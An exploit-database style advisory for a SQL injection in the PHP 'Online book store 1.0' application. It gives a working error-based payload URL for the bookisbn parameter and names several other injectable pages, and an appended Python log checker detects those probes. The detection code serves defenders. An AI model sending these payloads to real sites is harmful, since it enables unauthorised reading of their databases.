Online book store 1.0 bookisbn SQL injection Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2020-01-15 | Type : webapps | Platform : php
This exploit / vulnerability (Online book store 1.0 bookisbn SQL injection) is for educational purposes only; if you use it, you do so at your own risk!
$title = $row['book_title'];
require "./template/header.php";
?>
<!-- Example row of columns -->
<p class="lead" style="margin: 25px 0"><a href="books.php">Books</a> > <?php echo $row['book_title']; ?></p> <!-- results go here -->
-------------------------------------------------------------------------------------------------------------------
Exploit POC :
# Parameter: bookisbn (GET)
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
# Payload:
http://site.com/book.php?bookisbn=123' AND (SELECT 9724 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9724=9724,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.Tables GROUP BY x)a) AND 'aJYp'='aJYp
-----------------------
Other vulnerable pages with the same vulnerability:
[PAGE : bookPerPub.php], [PARAM : pubid], [Method : GET], [Vulnerable Code : Line 6 & Line 16]
[PAGE : edit_book.php], [PARAM : publisher], [Method : POST], [Vulnerable Code : Line 13 & Line 27 & Line 31]
[PAGE : checkout.php, Function : getBookByIsbn, Defined in database_functions.php], [PARAM : $isbn], [Method : SESSION], [Vulnerable Code : Line 30 & Line 26 in database_functions.php]
and other pages .... :)
Also you can have more fun with Other XSS bugs too :)
----
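A log check for the requests described above, as an added example that is not part of the original advisory: it flags access-log lines where the GET parameters named here (bookisbn on book.php, pubid on bookPerPub.php) carry the building blocks of the FLOOR error-based vector, or a value outside an allow-list. The allow-list patterns, the combined log format and the sample lines are assumptions constructed for the example; the POST and SESSION paths listed above do not show up in access logs and are not covered.

```python
import re
from urllib.parse import parse_qsl, quote, unquote_plus, urlsplit

# GET parameters the advisory names, each with an ASSUMED allow-list for
# legitimate values (ISBN-like string, numeric id); adjust to the real data.
WATCHED = {("book.php", "bookisbn"): re.compile(r"[0-9Xx-]{1,20}"),
           ("bookPerPub.php", "pubid"): re.compile(r"[0-9]{1,10}")}
# Building blocks of the error-based FLOOR vector quoted in the advisory.
MARKERS = [re.compile(p, re.I) for p in (
    r"floor\s*\(\s*rand\s*\(", r"information_schema", r"group\s+by", r"concat\s*\(")]
REQUEST = re.compile(r'"(?:GET|HEAD) (\S+) HTTP/[0-9.]+"')

def normalize(value):
    """Undo up to two extra URL-encoding layers; turn SQL inline comments into spaces."""
    return re.sub(r"/\*.*?\*/", " ", unquote_plus(unquote_plus(value)), flags=re.S)

def classify(line):
    """Return (page, param, verdict) for a suspicious log line, else None."""
    match = REQUEST.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    page = url.path.rsplit("/", 1)[-1]
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        allowed = WATCHED.get((page, name))
        if allowed is None:
            continue  # not a parameter the advisory lists for this page
        value = normalize(raw)
        if sum(bool(m.search(value)) for m in MARKERS) >= 3:
            return (page, name, "floor-vector")
        if not allowed.fullmatch(value):
            return (page, name, "malformed")
    return None

# Constructed sample log (documentation IP). The probe value is the advisory's
# vector template with its placeholders left unfilled.
TEMPLATE = ("123' AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',"
            "([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x "
            "FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)")
LINE = '203.0.113.7 - - [15/Jan/2020:10:00:00 +0000] "GET /%s HTTP/1.1" 200 512'
SAMPLE_LOG = [LINE % "book.php?bookisbn=978-1-484217-26-9",
              LINE % ("book.php?bookisbn=" + quote(TEMPLATE, safe="")),
              LINE % ("bookPerPub.php?pubid=" + quote(quote(TEMPLATE, safe=""), safe="")),
              LINE % "book.php?bookisbn=123%27"]

if __name__ == "__main__":
    print([classify(entry) for entry in SAMPLE_LOG])
```

The "malformed" verdict is the broader signal: it fires on any value that leaves the allow-list, including probes that do not use the FLOOR construct.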